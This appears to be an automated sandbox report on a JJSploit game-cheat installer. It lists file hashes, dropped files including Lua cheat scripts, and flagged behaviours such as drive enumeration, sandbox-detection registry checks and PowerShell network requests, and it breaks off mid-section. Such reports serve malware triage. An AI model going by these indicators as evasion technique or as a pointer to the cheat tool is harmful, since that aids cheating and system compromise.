Analysis
-
max time kernel
598s -
max time network
601s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
23-10-2024 16:05
Static task
static1
Behavioral task
behavioral1
Sample
JJSploit_8.10.8_x64_en-US.msi
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
JJSploit_8.10.8_x64_en-US.msi
Resource
win10v2004-20241007-en
General
-
Target
JJSploit_8.10.8_x64_en-US.msi
-
Size
5.0MB
-
MD5
b837d10b9a71425dbf3d62b2cc59f447
-
SHA1
85c9ba3331f7eb432c28365b0d1f36a201373a72
-
SHA256
76c83d1bebd6b01bab76d9a94f223e1a3cf20f2040b8d58a12625074e2936f7c
-
SHA512
f20999d19c470941c85912725d6f89c5073d475572ece92ce5b8e5425cdf012950f230c353870d86469ab6658bdc504abbb41260cb676f109551860433bcb405
-
SSDEEP
98304:XPky+agPtUpupDeOds+883iSh79bubjnvmu5/qv4eYb2Tqg9EeYImwqPY6Bvv8m:XPky9GtAcdsENbubzSJb9lyw
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 53 3780 powershell.exe 56 3780 powershell.exe -
Downloads MZ/PE file
-
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exemsiexec.exedescription ioc process File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\U: msiexec.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 4 IoCs
Processes:
MicrosoftEdgeUpdate.exeMicrosoftEdgeUpdate.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MicrosoftEdgeUpdate.exe\DisableExceptionChainValidation = "0" MicrosoftEdgeUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MicrosoftEdgeUpdate.exe MicrosoftEdgeUpdate.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MicrosoftEdgeUpdate.exe\DisableExceptionChainValidation = "0" MicrosoftEdgeUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MicrosoftEdgeUpdate.exe MicrosoftEdgeUpdate.exe -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
MicrosoftEdgeUpdate.exesetup.exemsedgewebview2.exemsedgewebview2.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation MicrosoftEdgeUpdate.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation setup.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation msedgewebview2.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation msedgewebview2.exe -
Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks system information in the registry 2 TTPs 22 IoCs
System information is often read in order to detect sandboxing environments.
Processes:
MicrosoftEdgeUpdate.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdate.exemsedgewebview2.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdate.exedescription ioc process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName MicrosoftEdgeUpdate.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName MicrosoftEdgeUpdate.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName MicrosoftEdgeUpdate.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName MicrosoftEdgeUpdate.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName MicrosoftEdgeUpdate.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName msedgewebview2.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer MicrosoftEdgeUpdate.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer MicrosoftEdgeUpdate.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName MicrosoftEdgeUpdate.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer MicrosoftEdgeUpdate.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName MicrosoftEdgeUpdate.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer MicrosoftEdgeUpdate.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName MicrosoftEdgeUpdate.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName MicrosoftEdgeUpdate.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer MicrosoftEdgeUpdate.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName MicrosoftEdgeUpdate.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer MicrosoftEdgeUpdate.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer MicrosoftEdgeUpdate.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer MicrosoftEdgeUpdate.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer MicrosoftEdgeUpdate.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer MicrosoftEdgeUpdate.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer msedgewebview2.exe -
Drops file in Program Files directory 64 IoCs
Processes:
MicrosoftEdgeWebview2Setup.exesetup.exeMicrosoftEdgeUpdateSetup_X86_1.3.195.27.exemsedgewebview2.exemsiexec.exedescription ioc process File created C:\Program Files (x86)\Microsoft\Temp\EU2304.tmp\msedgeupdateres_tr.dll MicrosoftEdgeWebview2Setup.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\130.0.2849.52\ffmpeg.dll setup.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\identity_proxy\win11\identity_helper.Sparse.Stable.msix setup.exe File created C:\Program Files (x86)\Microsoft\Temp\EU5F2A.tmp\msedgeupdateres_gd.dll MicrosoftEdgeUpdateSetup_X86_1.3.195.27.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping3604_2050096077\LICENSE msedgewebview2.exe File created C:\Program Files (x86)\Microsoft\Temp\EU2304.tmp\msedgeupdateres_de.dll MicrosoftEdgeWebview2Setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\130.0.2849.52\webview2_integration.dll setup.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\130.0.2849.52\pwahelper.exe setup.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\Locales\pt-PT.pak setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\130.0.2849.52\cookie_exporter.exe setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\130.0.2849.52\edge_game_assist\VERSION setup.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\Locales\as.pak setup.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping3604_535272181\hyph-sl.hyb msedgewebview2.exe File created C:\Program Files (x86)\Microsoft\Temp\EU5F2A.tmp\MicrosoftEdgeUpdateSetup.exe MicrosoftEdgeUpdateSetup_X86_1.3.195.27.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\130.0.2849.52\Locales\sk.pak setup.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\Trust Protection Lists\Sigma\Fingerprinting setup.exe File created C:\Program Files (x86)\Microsoft\Temp\EU5F2A.tmp\msedgeupdateres_bg.dll MicrosoftEdgeUpdateSetup_X86_1.3.195.27.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\Locales\sr-Cyrl-BA.pak setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\130.0.2849.52\learning_tools.dll setup.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\VisualElements\SmallLogoDev.png setup.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\MEIPreload\manifest.json setup.exe File created C:\Program Files (x86)\Microsoft\Temp\EU2304.tmp\msedgeupdateres_hi.dll MicrosoftEdgeWebview2Setup.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\130.0.2849.52\VisualElements\SmallLogoDev.png setup.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\130.0.2849.52\Locales\uk.pak setup.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\Locales\ca.pak setup.exe File created C:\Program Files\JJSploit\resources\luascripts\general\aimbot.lua msiexec.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\130.0.2849.52\Locales\da.pak setup.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\Locales\hi.pak setup.exe File created C:\Program Files (x86)\Microsoft\Temp\EU5F2A.tmp\NOTICE.TXT MicrosoftEdgeUpdateSetup_X86_1.3.195.27.exe File created C:\Program Files\JJSploit\resources\luascripts\general\infinitejump.lua msiexec.exe File created C:\Program Files (x86)\Microsoft\Temp\EU2304.tmp\msedgeupdateres_as.dll MicrosoftEdgeWebview2Setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\130.0.2849.52\VisualElements\LogoCanary.png setup.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping3604_535272181\hyph-ta.hyb msedgewebview2.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\130.0.2849.52\onnxruntime.dll setup.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\130.0.2849.52\Locales\it.pak setup.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\130.0.2849.52\Locales\pt-PT.pak setup.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping3604_535272181\hyph-mn-cyrl.hyb msedgewebview2.exe File created C:\Program Files (x86)\Microsoft\Temp\EU5F2A.tmp\MicrosoftEdgeUpdateCore.exe MicrosoftEdgeUpdateSetup_X86_1.3.195.27.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\130.0.2849.52\concrt140.dll setup.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\130.0.2849.52\WidevineCdm\_platform_specific\win_x64\widevinecdm.dll setup.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\130.0.2849.52\Locales\ne.pak setup.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\Locales\bn-IN.pak setup.exe File created C:\Program Files (x86)\Microsoft\Temp\EU5F2A.tmp\msedgeupdateres_th.dll MicrosoftEdgeUpdateSetup_X86_1.3.195.27.exe File created C:\Program Files\JJSploit\resources\luascripts\general\multidimensionalcharacter.lua msiexec.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\130.0.2849.52\Locales\mi.pak setup.exe File created C:\Program Files (x86)\Microsoft\Temp\EU5F2A.tmp\msedgeupdateres_es.dll MicrosoftEdgeUpdateSetup_X86_1.3.195.27.exe File created C:\Program Files (x86)\Microsoft\Temp\EU2304.tmp\EdgeUpdate.dat MicrosoftEdgeWebview2Setup.exe File created C:\Program Files (x86)\Microsoft\Temp\EU2304.tmp\msedgeupdateres_en.dll MicrosoftEdgeWebview2Setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\130.0.2849.52\oneds.dll setup.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\130.0.2849.52\Trust Protection Lists\Sigma\Other setup.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedge_200_percent.pak setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\130.0.2849.52\Locales\gd.pak setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\130.0.2849.52\WidevineCdm\manifest.json setup.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\130.0.2849.52\130.0.2849.52.manifest setup.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\130.0.2849.52\VisualElements\SmallLogo.png setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\130.0.2849.52\msedge.exe.sig setup.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\130.0.2849.52\libEGL.dll setup.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping3604_535272181\hyph-la.hyb msedgewebview2.exe File created C:\Program Files\JJSploit\resources\luascripts\jailbreak\walkspeed.lua msiexec.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\130.0.2849.52\Trust Protection Lists\Sigma\Content setup.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\Locales\nn.pak setup.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping3604_2050096077\keys.json msedgewebview2.exe File created C:\Program Files (x86)\Microsoft\Temp\EU5F2A.tmp\msedgeupdateres_lo.dll MicrosoftEdgeUpdateSetup_X86_1.3.195.27.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\130.0.2849.52\cookie_exporter.exe setup.exe -
Drops file in Windows directory 10 IoCs
Processes:
msiexec.exedescription ioc process File created C:\Windows\Installer\e580f0e.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\SourceHash{3D33D542-D2B2-4F33-A39D-CD4F70D3442E} msiexec.exe File opened for modification C:\Windows\Installer\MSI1095.tmp msiexec.exe File created C:\Windows\Installer\{3D33D542-D2B2-4F33-A39D-CD4F70D3442E}\ProductIcon msiexec.exe File created C:\Windows\Installer\e580f10.msi msiexec.exe File opened for modification C:\Windows\Installer\e580f0e.msi msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\{3D33D542-D2B2-4F33-A39D-CD4F70D3442E}\ProductIcon msiexec.exe -
Executes dropped EXE 42 IoCs
Processes:
MicrosoftEdgeWebview2Setup.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdateComRegisterShell64.exeMicrosoftEdgeUpdateComRegisterShell64.exeMicrosoftEdgeUpdateComRegisterShell64.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdate.exeMicrosoftEdge_X64_130.0.2849.52.exesetup.exesetup.exeMicrosoftEdgeUpdate.exeJJSploit.exemsedgewebview2.exemsedgewebview2.exemsedgewebview2.exemsedgewebview2.exemsedgewebview2.exemsedgewebview2.exemsedgewebview2.exemsedgewebview2.exemsedgewebview2.exemsedgewebview2.exeMicrosoftEdgeUpdate.exemsedgewebview2.exemsedgewebview2.exemsedgewebview2.exemsedgewebview2.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdateSetup_X86_1.3.195.27.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdateComRegisterShell64.exeMicrosoftEdgeUpdateComRegisterShell64.exeMicrosoftEdgeUpdateComRegisterShell64.exeMicrosoftEdgeUpdate.exemsedgewebview2.exepid process 768 MicrosoftEdgeWebview2Setup.exe 1044 MicrosoftEdgeUpdate.exe 2608 MicrosoftEdgeUpdate.exe 4428 MicrosoftEdgeUpdate.exe 440 MicrosoftEdgeUpdateComRegisterShell64.exe 3672 MicrosoftEdgeUpdateComRegisterShell64.exe 944 MicrosoftEdgeUpdateComRegisterShell64.exe 2712 MicrosoftEdgeUpdate.exe 3696 MicrosoftEdgeUpdate.exe 1440 MicrosoftEdgeUpdate.exe 4380 MicrosoftEdgeUpdate.exe 4332 MicrosoftEdge_X64_130.0.2849.52.exe 4788 setup.exe 2736 setup.exe 3220 MicrosoftEdgeUpdate.exe 3724 JJSploit.exe 3604 msedgewebview2.exe 1600 msedgewebview2.exe 3244 msedgewebview2.exe 4872 msedgewebview2.exe 3140 msedgewebview2.exe 4808 msedgewebview2.exe 1860 msedgewebview2.exe 5564 msedgewebview2.exe 4488 msedgewebview2.exe 5628 msedgewebview2.exe 5644 MicrosoftEdgeUpdate.exe 3616 msedgewebview2.exe 5440 msedgewebview2.exe 1928 msedgewebview2.exe 1140 msedgewebview2.exe 5152 MicrosoftEdgeUpdate.exe 5600 MicrosoftEdgeUpdateSetup_X86_1.3.195.27.exe 864 MicrosoftEdgeUpdate.exe 5460 MicrosoftEdgeUpdate.exe 5496 MicrosoftEdgeUpdate.exe 4928 MicrosoftEdgeUpdate.exe 1940 MicrosoftEdgeUpdateComRegisterShell64.exe 4944 MicrosoftEdgeUpdateComRegisterShell64.exe 4624 MicrosoftEdgeUpdateComRegisterShell64.exe 5896 MicrosoftEdgeUpdate.exe 2840 msedgewebview2.exe -
Loads dropped DLL 64 IoCs
Processes:
MsiExec.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdateComRegisterShell64.exeMicrosoftEdgeUpdateComRegisterShell64.exeMicrosoftEdgeUpdateComRegisterShell64.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdate.exeJJSploit.exemsedgewebview2.exemsedgewebview2.exemsedgewebview2.exemsedgewebview2.exemsedgewebview2.exemsedgewebview2.exemsedgewebview2.exemsedgewebview2.exemsedgewebview2.exemsedgewebview2.exeMicrosoftEdgeUpdate.exemsedgewebview2.exemsedgewebview2.exemsedgewebview2.exemsedgewebview2.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdateComRegisterShell64.exepid process 1384 MsiExec.exe 1044 MicrosoftEdgeUpdate.exe 2608 MicrosoftEdgeUpdate.exe 4428 MicrosoftEdgeUpdate.exe 440 MicrosoftEdgeUpdateComRegisterShell64.exe 4428 MicrosoftEdgeUpdate.exe 3672 MicrosoftEdgeUpdateComRegisterShell64.exe 4428 MicrosoftEdgeUpdate.exe 944 MicrosoftEdgeUpdateComRegisterShell64.exe 4428 MicrosoftEdgeUpdate.exe 2712 MicrosoftEdgeUpdate.exe 3696 MicrosoftEdgeUpdate.exe 1440 MicrosoftEdgeUpdate.exe 1440 MicrosoftEdgeUpdate.exe 3696 MicrosoftEdgeUpdate.exe 4380 MicrosoftEdgeUpdate.exe 3220 MicrosoftEdgeUpdate.exe 1384 MsiExec.exe 3724 JJSploit.exe 3604 msedgewebview2.exe 1600 msedgewebview2.exe 3604 msedgewebview2.exe 3604 msedgewebview2.exe 3604 msedgewebview2.exe 3244 msedgewebview2.exe 3244 msedgewebview2.exe 4872 msedgewebview2.exe 3140 msedgewebview2.exe 4872 msedgewebview2.exe 3140 msedgewebview2.exe 3244 msedgewebview2.exe 3244 msedgewebview2.exe 3244 msedgewebview2.exe 3244 msedgewebview2.exe 4808 msedgewebview2.exe 4808 msedgewebview2.exe 4808 msedgewebview2.exe 3604 msedgewebview2.exe 1860 msedgewebview2.exe 1860 msedgewebview2.exe 5564 msedgewebview2.exe 5564 msedgewebview2.exe 4488 msedgewebview2.exe 4488 msedgewebview2.exe 5628 msedgewebview2.exe 5628 msedgewebview2.exe 5644 MicrosoftEdgeUpdate.exe 3616 msedgewebview2.exe 3616 msedgewebview2.exe 5440 msedgewebview2.exe 5440 msedgewebview2.exe 5440 msedgewebview2.exe 1928 msedgewebview2.exe 1928 msedgewebview2.exe 1140 msedgewebview2.exe 1140 msedgewebview2.exe 5152 MicrosoftEdgeUpdate.exe 5152 MicrosoftEdgeUpdate.exe 5644 MicrosoftEdgeUpdate.exe 864 MicrosoftEdgeUpdate.exe 5460 MicrosoftEdgeUpdate.exe 5496 MicrosoftEdgeUpdate.exe 4928 MicrosoftEdgeUpdate.exe 1940 MicrosoftEdgeUpdateComRegisterShell64.exe -
Processes:
JJSploit.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA JJSploit.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs
-
System Location Discovery: System Language Discovery 1 TTPs 18 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
MicrosoftEdgeUpdate.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdateSetup_X86_1.3.195.27.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeWebview2Setup.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdate.exeMsiExec.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdate.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MicrosoftEdgeUpdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MicrosoftEdgeUpdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MicrosoftEdgeUpdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MicrosoftEdgeUpdateSetup_X86_1.3.195.27.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MicrosoftEdgeUpdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MicrosoftEdgeWebview2Setup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MicrosoftEdgeUpdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MicrosoftEdgeUpdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MicrosoftEdgeUpdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MicrosoftEdgeUpdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MicrosoftEdgeUpdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MicrosoftEdgeUpdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MicrosoftEdgeUpdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MicrosoftEdgeUpdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MicrosoftEdgeUpdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MicrosoftEdgeUpdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MicrosoftEdgeUpdate.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 5 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes:
MicrosoftEdgeUpdate.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdate.exepid process 864 MicrosoftEdgeUpdate.exe 5896 MicrosoftEdgeUpdate.exe 2712 MicrosoftEdgeUpdate.exe 4380 MicrosoftEdgeUpdate.exe 3220 MicrosoftEdgeUpdate.exe -
Checks SCSI registry key(s) 3 TTPs 5 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
vssvc.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000e3c1c56297b3270b0000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000e3c1c5620000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff000000000700010000680900e3c1c562000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1de3c1c562000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000e3c1c56200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
Processes:
